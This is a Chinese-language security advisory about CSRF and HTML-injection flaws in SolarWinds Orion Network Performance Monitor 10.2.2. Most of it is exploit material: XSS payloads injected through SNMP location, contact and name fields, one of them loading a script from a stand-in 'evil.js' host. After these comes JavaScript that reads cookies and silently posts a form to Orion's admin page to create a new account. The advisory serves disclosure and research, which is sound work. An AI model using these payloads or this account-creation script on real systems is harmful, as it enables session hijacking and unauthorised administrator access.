发布日期:2012-07-21
更新日期:2012-08-06
受影响系统:
SolarWinds Orion Network Performance Monitor (NPM) 10.2.2
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 54624
Orion Network Performance Monitor是带宽性能监控和故障管理软件,能监控并收集来自路由器、交换机、服务器和其他SNMP设备中的数据。
SolarWinds Orion Network Performance Monitor (NPM) 10.2.2及其他版本在实现上存在跨站请求伪造漏洞和多个HTML注入漏洞,攻击者可利用这些漏洞在用户会话中执行非法操作,在受影响站点中执行脚本代码,窃取cookie身份验证凭证或控制站点外观。
<*来源:Muts (muts@whitehat.co.il)
*>
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
Muts (muts@whitehat.co.il)提供了如下测试方法:
syslocation <script>alert('location')</script>
syscontact <script>alert('contact')</script>
sysName <script>alert('name')</script
syscontact <script src="https://www.example.com/evil.js"></script>
*/
function getCookie(c_name)
{
var i,x,y,ARRcookies=document.cookie.split(";");
for (i=0;i<ARRcookies.length;i++)
{
x=ARRcookies[i].substr(0,ARRcookies[i].indexOf("="));
y=ARRcookies[i].substr(ARRcookies[i].indexOf("=")+1);
x=x.replace(/^\s+|\s+$/g,"");
if (x==c_name)
{
return unescape(y);
}
}
}
function setCookie(c_name,value,exdays)
{
var exdate=new Date();
exdate.setDate(exdate.getDate() + exdays);
var c_value=escape(value) + ((exdays==null) ? "" : ";
expires="+exdate.toUTCString());
document.cookie=c_name + "=" + c_value;
}
function postCredentials(viewState, user, password)
{
var http = new XMLHttpRequest();
var url = "/Orion/Admin/Accounts/Add/OrionAccount.aspx?AccountType=Orion";
var params =
"ctl00%24ctl00%24ctl00%24BodyContent%24ScriptManagerPlaceHolder%24MasterScriptManager"
+ "=" +
"ctl00%24ctl00%24ctl00%24BodyContent%24ContentPlaceHolder1%24adminContentPlaceholder%24UpdatePanel1%257Cctl00%24ctl00%24ctl00%24BodyContent%24ContentPlaceHolder1%24adminContentPlaceholder%24createWizard%24__CustomNav0%24ImageButton1"
+ "&" +
"__EVENTTARGET" + "=" +
"ctl00%24ctl00%24ctl00%24BodyContent%24ContentPlaceHolder1%24adminContentPlaceholder%24createWizard%24__CustomNav0%24ImageButton1"
+ "&" +
"__EVENTARGUMENT" + "=" + "&" +
"__VIEWSTATE" + "=" + encodeURIComponent(viewState) + "&" +
"ctl00%24ctl00%24ctl00%24BodyContent%24ContentPlaceHolder1%24adminContentPlaceholder%24createWizard%24CreateUserStepContainer%24UserName"
+ "=" + user + "&" +
"ctl00%24ctl00%24ctl00%24BodyContent%24ContentPlaceHolder1%24adminContentPlaceholder%24createWizard%24CreateUserStepContainer%24Password"
+ "=" + password + "&" +
"ctl00%24ctl00%24ctl00%24BodyContent%24ContentPlaceHolder1%24adminContentPlaceholder%24createWizard%24CreateUserStepContainer%24ConfirmPassword"
+ "=" + password + "&" +
"__ASYNCPOST" + "=" + "false"
http.open("POST", url, false);
http.setRequestHeader("Content-type",
"application/x-www-form-urlencoded");
http.setRequestHeader("Content-lenth", params.length);
http.setRequestHeader("Connection", "close");
http.send(params);
var response = http.responseText;
var doc = document.implementation.createHTMLDocument('');
doc.documentElement.innerHTML = response;
return(doc);
}